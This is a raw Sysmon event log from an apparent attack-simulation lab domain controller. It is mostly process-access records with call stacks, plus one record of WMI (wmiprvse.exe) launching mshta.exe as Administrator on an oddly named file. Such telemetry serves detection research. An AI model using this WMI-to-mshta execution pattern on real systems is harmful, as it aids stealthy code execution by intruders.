15:59:12.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.288{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000022199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.299{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "C:\dsdfsiuhsdrfsawgfds"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000022198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 